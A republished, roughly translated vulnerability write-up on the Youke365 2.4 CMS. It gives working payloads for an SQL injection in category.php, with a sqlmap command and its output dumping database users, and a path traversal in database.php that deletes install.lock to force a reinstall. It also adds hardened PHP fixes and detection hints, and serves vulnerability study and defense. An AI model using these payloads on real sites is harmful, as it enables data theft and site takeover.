
An Sql injection vulnerability in Youke365_2_4 and an example Analysis of arbitrary File deletion

2025-02-05 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains in detail an SQL injection vulnerability in Youke365_2_4 and gives an example analysis of an arbitrary file deletion. The content of the article is of high quality, so the editor shares it for your reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Part 0: Preface

Every day is a new day.

There's nothing to complain about. Get to the point.

/system/category.php: an SQL injection

# lines 80-87
$root_id = intval(trim($_POST['root_id']));
$cate_name = trim($_POST['cate_name']);
$cate_dir = trim($_POST['cate_dir']);
$cate_url = trim($_POST['cate_url']);
$cate_isbest = intval($_POST['cate_isbest']);
$cate_order = intval($_POST['cate_order']);
$cate_keywords = trim($_POST['cate_keywords']);
$cate_description = trim($_POST['cate_description']);

if ($action == 'saveadd') {
    // $cate_name is interpolated into the query string without escaping
    $query = $DB->query("SELECT cate_id FROM $table WHERE root_id='$root_id' AND cate_name='$cate_name'");
    if ($DB->num_rows($query)) {
        msgbox('The category you added already exists!');
    }
    $DB->insert($table, $data);
    update_categories();
    update_cache('categories');
    $fileurl = empty($root_id) ? $fileurl.'?act=add' : $fileurl.'?act=add&root_id='.$root_id;
    msgbox('Category added successfully!', $fileurl);
} elseif ($action == 'saveedit') {
    $cate_id = intval($_POST['cate_id']);
    $where = array('cate_id' => $cate_id);
    // ... (the rest of this branch is not shown in the original excerpt)

First of all, look at $cate_name: it takes the parameter from POST and only trims the surrounding whitespace.

Then, when the $action parameter is saveadd, $cate_name is concatenated straight into the query.

The code checks whether the name already exists in the database, and if so enters msgbox('The category you added already exists!').

If it does not exist, the category is added.

Notice line 20 of the code: we can be sure that the value is first run through an SQL statement.

Vulnerability exploitation

If an error is reported, it doesn't matter. Let's turn on MySQL query logging to see whether our input made it into the SQL query.

SELECT cate_id FROM dir_categories WHERE root_id='1' AND cate_name='aaaa' and 1=1 -- '

Considering that the cookie may expire over a long run, it is recommended that you use the --technique parameter directly to specify the injection type.

sqlmap -r "/mnt/d/test.txt" -p cate_name --dbms=mysql --random-agent --technique=B --users

Results:

Parameter: cate_name (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: root_id=1&cate_name=aaaa' AND 6067=6067 AND 'yrhI'='yrhI&cate_dir=aaaa&cate_url=aaaa&cate_keywords=aaaa&cate_description=aaa&cate_order=0&act=saveadd
---
[17:58:46] [INFO] testing MySQL
[17:58:46] [INFO] confirming MySQL
[17:58:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.0
[17:58:46] [INFO] fetching database users
[17:58:46] [INFO] fetching number of database users
[17:58:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:58:46] [INFO] retrieved: 3
[17:59:28] [INFO] retrieved: 'root'@'localhost'
[18:10:25] [INFO] retrieved: 'root'@'127.0.0.1'
[18:22:37] [INFO] retrieved: 'root'@'::1'
database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

Of course, the cookie may expire while the data is being retrieved, but there is no CAPTCHA on the admin login.

Once we know the admin account password, we can write our own tool.

Because I am lazy, I will not write poc for the time being.
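The duplicate-name check from /system/category.php rewritten with a bound parameter, as an added example (not Youke365's own code). It runs against an in-memory SQLite table built here for the demo (requires PHP's pdo_sqlite), and replaces the CMS's $DB wrapper with PDO; the two probes are the ones visible in the MySQL log above.

```php
<?php
// Added example: vulnerable and hardened forms of the category lookup side by side.
// Table layout, row data and the use of PDO/SQLite are constructed for this demo.

function make_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE dir_categories (cate_id INTEGER PRIMARY KEY, root_id INTEGER, cate_name TEXT)');
    $db->exec("INSERT INTO dir_categories (root_id, cate_name) VALUES (1, 'aaaa'), (1, 'tools')");
    return $db;
}

// Vulnerable form: the same string interpolation as lines 80-87 of the original.
function category_exists_unsafe(PDO $db, int $root_id, string $cate_name): bool {
    $sql = "SELECT cate_id FROM dir_categories WHERE root_id='$root_id' AND cate_name='$cate_name'";
    return (bool) $db->query($sql)->fetchColumn();
}

// Hardened form: the name is bound as data, so it can never become part of the SQL.
function category_exists_safe(PDO $db, int $root_id, string $cate_name): bool {
    $stmt = $db->prepare('SELECT cate_id FROM dir_categories WHERE root_id = :root_id AND cate_name = :cate_name');
    $stmt->execute([':root_id' => $root_id, ':cate_name' => $cate_name]);
    return $stmt->fetchColumn() !== false;
}

$db = make_demo_db();
foreach (["aaaa' and 1=1 -- ", "aaaa' and 1=2 -- "] as $probe) {
    // Unsafe: the answer flips with the injected condition (true, then false),
    // which is exactly the signal a boolean-based blind test looks for.
    // Safe: both strings are looked up as literal names and neither exists (false, false).
    var_dump(category_exists_unsafe($db, 1, $probe), category_exists_safe($db, 1, $probe));
}
```

A query log entry whose WHERE clause ends in a comment marker after a quoted value, as in the log line shown above, is the corresponding detection signal on the database side.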

/system/database.php: file deletion can cause the CMS to be reinstalled

// lines 156-165
if ($action == 'delete') {
    $bakfile = trim($_GET['file']);
    // the GET value is joined to the backup directory without any path check
    $filepath = $DBak->datadir.$bakfile;
    if (unlink($filepath)) {
        msgbox('File deleted successfully!', $fileurl.'?act=restore');
    } else {
        msgbox('File deletion failed!');
    }
}

OK, let's move on to line 158.

First it takes the file parameter from GET, trims the whitespace on both sides, and stores it in $bakfile.

Then it concatenates the file path. datadir is used here; let's take a look at it.

public function __construct($db_host, $db_user, $db_pass, $db_name, $charset = 'utf8') {
    $this->connect($db_host, $db_user, $db_pass, $db_name, $charset); // connect to the database
    $this->datadir = ROOT_PATH.'data/dbbak/';
}

Some partners may ask: even if the file is deleted successfully, this does not achieve arbitrary file deletion.

This only deletes files in the specified directory.

So we need a way to delete files in other directories.

Use ../ to go up a directory. For example, to delete a file in the root directory, you need to go up twice.

Payload: system/database.php?act=delete&file=../../a.txt

OK, some friends may find deleting an arbitrary file pointless.

Next, let's move on.

/install/install.php, lines 17-19

// check whether the system is already installed
if (file_exists(ROOT_PATH.'data/install.lock')) {
    failure('You have already installed this system! If you want to continue with the installation, please delete data/install.lock first');
}

First, before the CMS is reinstalled, it checks whether the data/install.lock file exists; if it does, the code below is not reached.

If it does not exist, the system is reinstalled.

Then we just need to delete the data/install.

Payload: system/database.php?act=delete&file=../../data/install.lock

Then you can reinstall it.

Because reinstallation will take the site down, it is not recommended that you actually reinstall or delete arbitrary files.
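A hardened version of the delete branch from /system/database.php, as an added example (not Youke365's own code). It keeps the datadir layout shown above but only accepts a plain file name that resolves inside data/dbbak/; the temporary directory tree it builds (data/dbbak/backup.sql and data/install.lock) is constructed for the demo.

```php
<?php
// Added example: a path-contained replacement for the unlink() at lines 156-165.

function safe_delete_backup(string $datadir, string $bakfile): bool {
    // Accept a bare file name only: no slashes, no "..", no empty or dot-prefixed names.
    if ($bakfile === '' || $bakfile[0] === '.' || basename($bakfile) !== $bakfile) {
        return false;
    }
    $base = realpath($datadir);
    $target = realpath($datadir . '/' . $bakfile);
    if ($base === false || $target === false) {
        return false; // backup directory missing, or file does not exist
    }
    // Belt and braces: the resolved path must still sit below the backup directory.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return unlink($target);
}

// Throwaway copy of the relevant layout: ROOT/data/dbbak/ and ROOT/data/install.lock
$root = sys_get_temp_dir() . '/youke_demo_' . uniqid();
mkdir("$root/data/dbbak", 0700, true);
file_put_contents("$root/data/dbbak/backup.sql", "-- constructed backup\n");
file_put_contents("$root/data/install.lock", '');
$datadir = "$root/data/dbbak/";

// The traversal value from the page is rejected and install.lock survives ...
var_dump(safe_delete_backup($datadir, '../../data/install.lock')); // bool(false)
var_dump(file_exists("$root/data/install.lock"));                   // bool(true)
// ... while a genuine backup inside the directory can still be removed.
var_dump(safe_delete_backup($datadir, 'backup.sql'));               // bool(true)
var_dump(file_exists("$root/data/dbbak/backup.sql"));               // bool(false)
```

For monitoring, a request to database.php with act=delete whose file parameter contains a slash or ".." is the pattern to alert on, since a legitimate backup name never needs either.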

This is the end of the example analysis of an SQL injection vulnerability in Youke365_2_4 and an arbitrary file deletion. I hope the above content is of some help to you and that you have learned something from it. If you think the article is good, you can share it for more people to see.
